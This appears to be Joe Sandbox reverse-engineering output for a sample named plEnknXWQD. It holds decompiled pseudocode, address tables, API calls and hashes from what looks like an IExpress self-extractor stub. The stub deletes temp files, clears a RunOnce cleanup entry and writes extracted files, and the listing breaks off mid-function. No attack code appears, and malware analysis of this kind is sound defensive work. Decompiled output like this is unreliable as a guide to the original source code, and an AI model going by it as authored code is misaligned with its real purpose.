                                                				_t21 = __ebx;
                                                				_t9 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t9 ^ _t33;
                                                				_push(__esi);
                                                				_t31 =  *0x3891e0; // 0x2cf8298
                                                				if(_t31 != 0) {
                                                					_push(__edi);
                                                					do {
                                                						_t29 = _t31;
                                                						if( *0x388a24 == 0 &&  *0x389a30 == 0) {
                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                							DeleteFileA( *_t31); // executed
                                                						}
                                                						_t31 = _t31[1];
                                                						LocalFree( *_t29);
                                                						LocalFree(_t29);
                                                					} while (_t31 != 0);
                                                					_pop(_t28);
                                                				}
                                                				_t11 =  *0x388a20; // 0x0
                                                				_pop(_t32);
                                                				if(_t11 != 0 &&  *0x388a24 == 0 &&  *0x389a30 == 0) {
                                                					_push(_t22);
                                                					E00381781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                					if(( *0x389a34 & 0x00000020) != 0) {
                                                						E003865E8( &_v268);
                                                					}
                                                					SetCurrentDirectoryA(".."); // executed
                                                					_t22 =  &_v268;
                                                					E00382390( &_v268);
                                                					_t11 =  *0x388a20; // 0x0
                                                				}
                                                				if( *0x389a40 != 1 && _t11 != 0) {
                                                					_t11 = E00381FE1(_t22); // executed
                                                				}
                                                				 *0x388a20 =  *0x388a20 & 0x00000000;
                                                				return E00386CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                			}












                                                0x003852b6
                                                0x003852b6
                                                0x003852b6
                                                0x003852c1
                                                0x003852c8
                                                0x003852cb
                                                0x003852cc
                                                0x003852d4
                                                0x003852d6
                                                0x003852d7
                                                0x003852de
                                                0x003852e0
                                                0x003852f2
                                                0x003852fa
                                                0x003852fa
                                                0x00385302
                                                0x00385305
                                                0x0038530c
                                                0x00385312
                                                0x00385316
                                                0x00385316
                                                0x00385317
                                                0x0038531c
                                                0x0038531f
                                                0x00385333
                                                0x00385345
                                                0x00385351
                                                0x00385359
                                                0x00385359
                                                0x00385363
                                                0x00385369
                                                0x0038536f
                                                0x00385374
                                                0x00385374
                                                0x00385381
                                                0x00385387
                                                0x00385387
                                                0x0038538f
                                                0x003853a0

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(02CF8298,00000080,?,00000000), ref: 003852F2
                                                • DeleteFileA.KERNELBASE(02CF8298), ref: 003852FA
                                                • LocalFree.KERNEL32(02CF8298,?,00000000), ref: 00385305
                                                • LocalFree.KERNEL32(02CF8298), ref: 0038530C
                                                • SetCurrentDirectoryA.KERNELBASE(003811FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00385363
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00385334
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                • API String ID: 2833751637-1193786559
                                                • Opcode ID: 73918a25c6ffb34ef5cdac494c6548edfcadac45ea26a302c56419e70df1dbd1
                                                • Instruction ID: ff7a38721b440707624c601edc02ebc96f052f4da9c2d03f2f0ecf4e00697352
                                                • Opcode Fuzzy Hash: 73918a25c6ffb34ef5cdac494c6548edfcadac45ea26a302c56419e70df1dbd1
                                                • Instruction Fuzzy Hash: 28219035510B14DFDB37BB20ED49B6977B8BB04750F4901EAE9825A1A0CFF85D89CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00381FE1(void* __ecx) {
                                                				void* _v8;
                                                				long _t4;
                                                
                                                				if( *0x388530 != 0) {
                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                					if(_t4 == 0) {
                                                						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                						return RegCloseKey(_v8);
                                                					}
                                                				}
                                                				return _t4;
                                                			}





                                                0x00381fee
                                                0x00382005
                                                0x0038200d
                                                0x00382017
                                                0x00000000
                                                0x00382020
                                                0x0038200d
                                                0x00382029

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0038538C,?,?,0038538C), ref: 00382005
                                                • RegDeleteValueA.KERNELBASE(0038538C,wextract_cleanup0,?,?,0038538C), ref: 00382017
                                                • RegCloseKey.ADVAPI32(0038538C,?,?,0038538C), ref: 00382020
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                • API String ID: 849931509-702805525
                                                • Opcode ID: 61367d3588cc03189e33e3c854f73f7d542faa905751499ec140d667e12eb6f9
                                                • Instruction ID: b4b09845957cf5e7f14d4f33b6d04e77742a092c62c456125c06785c2c90caef
                                                • Opcode Fuzzy Hash: 61367d3588cc03189e33e3c854f73f7d542faa905751499ec140d667e12eb6f9
                                                • Instruction Fuzzy Hash: A7E086B0950318BBE723AFE0EC0AF5A7B6DF741741F6001D5F904A0060EB715E14E705
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00384CD0(char* __edx, long _a4, int _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t30;
                                                				long _t32;
                                                				signed int _t33;
                                                				long _t35;
                                                				long _t36;
                                                				struct HWND__* _t37;
                                                				long _t38;
                                                				long _t39;
                                                				long _t41;
                                                				long _t44;
                                                				long _t45;
                                                				long _t46;
                                                				signed int _t50;
                                                				long _t51;
                                                				char* _t58;
                                                				long _t59;
                                                				char* _t63;
                                                				long _t64;
                                                				CHAR* _t71;
                                                				CHAR* _t74;
                                                				int _t75;
                                                				signed int _t76;
                                                
                                                				_t69 = __edx;
                                                				_t29 =  *0x388004; // 0xb25159a8
                                                				_t30 = _t29 ^ _t76;
                                                				_v8 = _t30;
                                                				_t75 = _a8;
                                                				if( *0x3891d8 == 0) {
                                                					_t32 = _a4;
                                                					__eflags = _t32;
                                                					if(_t32 == 0) {
                                                						_t33 = E00384E99(_t75);
                                                						L35:
                                                						return E00386CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                					}
                                                					_t35 = _t32 - 1;
                                                					__eflags = _t35;
                                                					if(_t35 == 0) {
                                                						L9:
                                                						_t33 = 0;
                                                						goto L35;
                                                					}
                                                					_t36 = _t35 - 1;
                                                					__eflags = _t36;
                                                					if(_t36 == 0) {
                                                						_t37 =  *0x388584; // 0x0
                                                						__eflags = _t37;
                                                						if(_t37 != 0) {
                                                							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                						}
                                                						_t54 = 0x3891e4;
                                                						_t58 = 0x3891e4;
                                                						do {
                                                							_t38 =  *_t58;
                                                							_t58 =  &(_t58[1]);
                                                							__eflags = _t38;
                                                						} while (_t38 != 0);
                                                						_t59 = _t58 - 0x3891e5;
                                                						__eflags = _t59;
                                                						_t71 =  *(_t75 + 4);
                                                						_t73 =  &(_t71[1]);
                                                						do {
                                                							_t39 =  *_t71;
                                                							_t71 =  &(_t71[1]);
                                                							__eflags = _t39;
                                                						} while (_t39 != 0);
                                                						_t69 = _t71 - _t73;
                                                						_t30 = _t59 + 1 + _t71 - _t73;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							L3:
                                                							_t33 = _t30 | 0xffffffff;
                                                							goto L35;
                                                						}
                                                						_t69 = 0x3891e4;
                                                						_t30 = E00384702( &_v268, 0x3891e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(__eflags == 0) {
                                                							goto L3;
                                                						}
                                                						_t41 = E0038476D( &_v268, __eflags);
                                                						__eflags = _t41;
                                                						if(_t41 == 0) {
                                                							goto L9;
                                                						}
                                                						_push(0x180);
                                                						_t30 = E00384980( &_v268, 0x8302); // executed
                                                						_t75 = _t30;
                                                						__eflags = _t75 - 0xffffffff;
                                                						if(_t75 == 0xffffffff) {
                                                							goto L3;
                                                						}
                                                						_t30 = E003847E0( &_v268);
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						 *0x3893f4 =  *0x3893f4 + 1;
                                                						_t33 = _t75;
                                                						goto L35;
                                                					}
                                                					_t44 = _t36 - 1;
                                                					__eflags = _t44;
                                                					if(_t44 == 0) {
                                                						_t54 = 0x3891e4;
                                                						_t63 = 0x3891e4;
                                                						do {
                                                							_t45 =  *_t63;
                                                							_t63 =  &(_t63[1]);
                                                							__eflags = _t45;
                                                						} while (_t45 != 0);
                                                						_t74 =  *(_t75 + 4);
                                                						_t64 = _t63 - 0x3891e5;
                                                						__eflags = _t64;
                                                						_t69 =  &(_t74[1]);
                                                						do {
                                                							_t46 =  *_t74;
                                                							_t74 =  &(_t74[1]);
                                                							__eflags = _t46;
                                                						} while (_t46 != 0);
                                                						_t73 = _t74 - _t69;
                                                						_t30 = _t64 + 1 + _t74 - _t69;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							goto L3;
                                                						}
                                                						_t69 = 0x3891e4;
                                                						_t30 = E00384702( &_v268, 0x3891e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                						_t30 = E00384C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						E00384B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                						__eflags = _t50;
                                                						if(_t50 != 0) {
                                                							_t51 = _t50 & 0x00000027;
                                                							__eflags = _t51;
                                                						} else {
                                                							_t51 = 0x80;
                                                						}
                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						} else {
                                                							_t33 = 1;
                                                							goto L35;
                                                						}
                                                					}
                                                					_t30 = _t44 - 1;
                                                					__eflags = _t30;
                                                					if(_t30 == 0) {
                                                						goto L3;
                                                					}
                                                					goto L9;
                                                				}
                                                				if(_a4 == 3) {
                                                					_t30 = E00384B60( *((intOrPtr*)(_t75 + 0x14)));
                                                				}
                                                				goto L3;
                                                			}































                                                0x00384cd0
                                                0x00384cdb
                                                0x00384ce0
                                                0x00384ce2
                                                0x00384cee
                                                0x00384cf2
                                                0x00384d0e
                                                0x00384d0e
                                                0x00384d11
                                                0x00384e83
                                                0x00384e88
                                                0x00384e98
                                                0x00384e98
                                                0x00384d17
                                                0x00384d17
                                                0x00384d1a
                                                0x00384d2f
                                                0x00384d2f
                                                0x00000000
                                                0x00384d2f
                                                0x00384d1c
                                                0x00384d1c
                                                0x00384d1f
                                                0x00384dcb
                                                0x00384dd0
                                                0x00384dd2
                                                0x00384ddd
                                                0x00384ddd
                                                0x00384de3
                                                0x00384de8
                                                0x00384ded
                                                0x00384ded
                                                0x00384def
                                                0x00384df0
                                                0x00384df0
                                                0x00384df4
                                                0x00384df4
                                                0x00384df6
                                                0x00384df9
                                                0x00384dfc
                                                0x00384dfc
                                                0x00384dfe
                                                0x00384dff
                                                0x00384dff
                                                0x00384e03
                                                0x00384e08
                                                0x00384e0a
                                                0x00384e0f
                                                0x00384d03
                                                0x00384d03
                                                0x00000000
                                                0x00384d03
                                                0x00384e18
                                                0x00384e20
                                                0x00384e25
                                                0x00384e27
                                                0x00000000
                                                0x00000000
                                                0x00384e33
                                                0x00384e38
                                                0x00384e3a
                                                0x00000000
                                                0x00000000
                                                0x00384e40
                                                0x00384e51
                                                0x00384e56
                                                0x00384e5b
                                                0x00384e5e
                                                0x00000000
                                                0x00000000
                                                0x00384e6a
                                                0x00384e6f
                                                0x00384e71
                                                0x00000000
                                                0x00000000
                                                0x00384e77
                                                0x00384e7d
                                                0x00000000
                                                0x00384e7d
                                                0x00384d25
                                                0x00384d25
                                                0x00384d28
                                                0x00384d36
                                                0x00384d3b
                                                0x00384d40
                                                0x00384d40
                                                0x00384d42
                                                0x00384d43
                                                0x00384d43
                                                0x00384d47
                                                0x00384d4a
                                                0x00384d4a
                                                0x00384d4c
                                                0x00384d4f
                                                0x00384d4f
                                                0x00384d51
                                                0x00384d52
                                                0x00384d52
                                                0x00384d56
                                                0x00384d5b
                                                0x00384d5d
                                                0x00384d62
                                                0x00000000
                                                0x00000000
                                                0x00384d67
                                                0x00384d6f
                                                0x00384d74
                                                0x00384d76
                                                0x00000000
                                                0x00000000
                                                0x00384d7c
                                                0x00384d84
                                                0x00384d89
                                                0x00384d8b
                                                0x00000000
                                                0x00000000
                                                0x00384d94
                                                0x00384d99
                                                0x00384d9e
                                                0x00384da1
                                                0x00384daa
                                                0x00384daa
                                                0x00384da3
                                                0x00384da3
                                                0x00384da3
                                                0x00384db5
                                                0x00384dbb
                                                0x00384dbd
                                                0x00000000
                                                0x00384dc3
                                                0x00384dc5
                                                0x00000000
                                                0x00384dc5
                                                0x00384dbd
                                                0x00384d2a
                                                0x00384d2a
                                                0x00384d2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00384d2d
                                                0x00384cf8
                                                0x00384cfd
                                                0x00384d02
                                                0x00000000

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00384DB5
                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00384DDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: AttributesFileItemText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                • API String ID: 3625706803-1193786559
                                                • Opcode ID: b4755a7dfb1c4c6ab7505a304494117f33ed129e2e15a8d28f4e4c7de82e71a4
                                                • Instruction ID: cbfc8e4d05e425d0a1d6f8d8b3e2ab7c046ead4255a36cf8aed044f3a58fc305
                                                • Opcode Fuzzy Hash: b4755a7dfb1c4c6ab7505a304494117f33ed129e2e15a8d28f4e4c7de82e71a4
                                                • Instruction Fuzzy Hash: 5741F6362043039BCF27BF38D9546B573A9EB45300F1546E9E8829BE86DA31EE4AC750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00384C37(signed int __ecx, int __edx, int _a4) {
                                                				struct _FILETIME _v12;
                                                				struct _FILETIME _v20;
                                                				FILETIME* _t14;
                                                				int _t15;
                                                				signed int _t21;
                                                
                                                				_t21 = __ecx * 0x18;
                                                				if( *((intOrPtr*)(_t21 + 0x388d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					_t14 =  &_v12;
                                                					_t15 = SetFileTime( *(_t21 + 0x388d74), _t14, _t14, _t14); // executed
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					return 1;
                                                				}
                                                			}








                                                0x00384c40
                                                0x00384c4a
                                                0x00384c8d
                                                0x00000000
                                                0x00384c70
                                                0x00384c70
                                                0x00384c7e
                                                0x00384c86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00384c8a

                                                APIs
                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00384C54
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00384C66
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00384C7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Time$File$DateLocal
                                                • String ID:
                                                • API String ID: 2071732420-0
                                                • Opcode ID: 59cde3e90fa16076ec4815852df8e5cf8d33c99705f05d2b5a9334e270ec99ab
                                                • Instruction ID: b81bbee00f5e01373fa49f43bb33c1a45b4106c6d451a5dea6c73a5b32140095
                                                • Opcode Fuzzy Hash: 59cde3e90fa16076ec4815852df8e5cf8d33c99705f05d2b5a9334e270ec99ab
                                                • Instruction Fuzzy Hash: B9F0307260130EBFAB26EFB5CC49DBB77BDEB04340B4445ABB915C1851EA30D914D7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0038487A(CHAR* __ecx, signed int __edx) {
                                                				void* _t7;
                                                				CHAR* _t11;
                                                				long _t18;
                                                				long _t23;
                                                
                                                				_t11 = __ecx;
                                                				asm("sbb edi, edi");
                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                				if((__edx & 0x00000100) == 0) {
                                                					asm("sbb esi, esi");
                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                				} else {
                                                					if((__edx & 0x00000400) == 0) {
                                                						asm("sbb esi, esi");
                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                					} else {
                                                						_t23 = 1;
                                                					}
                                                				}
                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                					return _t7;
                                                				} else {
                                                					E0038490C(_t11);
                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                				}
                                                			}







                                                0x00384880
                                                0x0038488c
                                                0x00384894
                                                0x003848a0
                                                0x003848c9
                                                0x003848ce
                                                0x003848a2
                                                0x003848a8
                                                0x003848b7
                                                0x003848bc
                                                0x003848aa
                                                0x003848ac
                                                0x003848ac
                                                0x003848a8
                                                0x003848de
                                                0x003848e7
                                                0x0038490b
                                                0x003848ee
                                                0x003848f0
                                                0x00000000
                                                0x00384902

                                                APIs
                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00384A23,?,00384F67,*MEMCAB,00008000,00000180), ref: 003848DE
                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00384F67,*MEMCAB,00008000,00000180), ref: 00384902
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: eed2fc9838f798ef175d0533031ffaded3f065299279f146f9003f3c57fa1f9a
                                                • Instruction ID: 8e75ebb47ec13a04155aaea2ab1a75823f5deb8acef0a3cedeb734b32e887c62
                                                • Opcode Fuzzy Hash: eed2fc9838f798ef175d0533031ffaded3f065299279f146f9003f3c57fa1f9a
                                                • Instruction Fuzzy Hash: B9014BA3E1167126F32660294C88FB7555CCB96734F1B0375FDAAE79D1D6654C0483E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00384AD0(signed int _a4, void* _a8, long _a12) {
                                                				signed int _t9;
                                                				int _t12;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t20;
                                                				struct HWND__* _t21;
                                                				signed int _t24;
                                                				signed int _t25;
                                                
                                                				_t20 =  *0x38858c; // 0x268
                                                				_t9 = E00383680(_t20);
                                                				if( *0x3891d8 == 0) {
                                                					_push(_t24);
                                                					_t12 = WriteFile( *(0x388d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                					if(_t12 != 0) {
                                                						_t25 = _a12;
                                                						if(_t25 != 0xffffffff) {
                                                							_t14 =  *0x389400; // 0x110000
                                                							_t15 = _t14 + _t25;
                                                							 *0x389400 = _t15;
                                                							if( *0x388184 != 0) {
                                                								_t21 =  *0x388584; // 0x0
                                                								if(_t21 != 0) {
                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3893f8, 0);
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t25 = _t24 | 0xffffffff;
                                                					}
                                                					return _t25;
                                                				} else {
                                                					return _t9 | 0xffffffff;
                                                				}
                                                			}











                                                0x00384ad5
                                                0x00384adb
                                                0x00384ae7
                                                0x00384aee
                                                0x00384b05
                                                0x00384b0d
                                                0x00384b14
                                                0x00384b1a
                                                0x00384b1c
                                                0x00384b21
                                                0x00384b2a
                                                0x00384b2f
                                                0x00384b31
                                                0x00384b39
                                                0x00384b54
                                                0x00384b54
                                                0x00384b39
                                                0x00384b2f
                                                0x00384b0f
                                                0x00384b0f
                                                0x00384b0f
                                                0x00384b5e
                                                0x00384ae9
                                                0x00384aed
                                                0x00384aed

                                                APIs
                                                  • Part of subcall function 00383680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0038369F
                                                  • Part of subcall function 00383680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836B2
                                                  • Part of subcall function 00383680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836DA
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00384B05
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                • String ID:
                                                • API String ID: 1084409-0
                                                • Opcode ID: 60778bf1d39b982d4d5f46a5e9fc902068b611e2b7f1fecbc240a39429f25c85
                                                • Instruction ID: 75a702e1ec61bfe803adbc98e7646b6678840cec51fde4ca2777b77ea6d4adf8
                                                • Opcode Fuzzy Hash: 60778bf1d39b982d4d5f46a5e9fc902068b611e2b7f1fecbc240a39429f25c85
                                                • Instruction Fuzzy Hash: AD01D231240306ABDB179F58DC05BA2775CF744725F0A82A6F9399B5E0CB70C811CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0038658A(char* __ecx, void* __edx, char* _a4) {
                                                				intOrPtr _t4;
                                                				char* _t6;
                                                				char* _t8;
                                                				void* _t10;
                                                				void* _t12;
                                                				char* _t16;
                                                				intOrPtr* _t17;
                                                				void* _t18;
                                                				char* _t19;
                                                
                                                				_t16 = __ecx;
                                                				_t10 = __edx;
                                                				_t17 = __ecx;
                                                				_t1 = _t17 + 1; // 0x388b3f
                                                				_t12 = _t1;
                                                				do {
                                                					_t4 =  *_t17;
                                                					_t17 = _t17 + 1;
                                                				} while (_t4 != 0);
                                                				_t18 = _t17 - _t12;
                                                				_t2 = _t18 + 1; // 0x388b40
                                                				if(_t2 < __edx) {
                                                					_t19 = _t18 + __ecx;
                                                					if(_t19 > __ecx) {
                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                						if( *_t8 != 0x5c) {
                                                							 *_t19 = 0x5c;
                                                							_t19 =  &(_t19[1]);
                                                						}
                                                					}
                                                					_t6 = _a4;
                                                					 *_t19 = 0;
                                                					while( *_t6 == 0x20) {
                                                						_t6 = _t6 + 1;
                                                					}
                                                					return E003816B3(_t16, _t10, _t6);
                                                				}
                                                				return 0x8007007a;
                                                			}












                                                0x00386592
                                                0x00386594
                                                0x00386596
                                                0x00386598
                                                0x00386598
                                                0x0038659b
                                                0x0038659b
                                                0x0038659d
                                                0x0038659e
                                                0x003865a2
                                                0x003865a4
                                                0x003865a9
                                                0x003865b2
                                                0x003865b6
                                                0x003865ba
                                                0x003865c3
                                                0x003865c5
                                                0x003865c8
                                                0x003865c8
                                                0x003865c3
                                                0x003865c9
                                                0x003865cc
                                                0x003865d2
                                                0x003865d1
                                                0x003865d1
                                                0x00000000
                                                0x003865dc
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(00388B3E,00388B3F,00000001,00388B3E,-00000003,?,003860EC,00381140,?), ref: 003865BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CharPrev
                                                • String ID:
                                                • API String ID: 122130370-0
                                                • Opcode ID: f60102e021bb35bbdea89c281924d2b059f54dc958b667484dcc26606512963b
                                                • Instruction ID: 644a99e913c733a39f257a479630ac18578dc472c66d0946aa7de9cd755151e3
                                                • Opcode Fuzzy Hash: f60102e021bb35bbdea89c281924d2b059f54dc958b667484dcc26606512963b
                                                • Instruction Fuzzy Hash: 32F04C321043509BD733291D9885B67BFDE9B87350F2901EEE8DAC3205DA658C4683A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E0038621E() {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t5;
                                                				void* _t9;
                                                				void* _t13;
                                                				void* _t19;
                                                				void* _t20;
                                                				signed int _t21;
                                                
                                                				_t5 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t5 ^ _t21;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					0x4f0 = 2;
                                                					_t9 = E0038597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                				} else {
                                                					E003844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                					 *0x389124 = E00386285();
                                                					_t9 = 0;
                                                				}
                                                				return E00386CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                			}











                                                0x00386229
                                                0x00386230
                                                0x00386247
                                                0x0038626a
                                                0x00386272
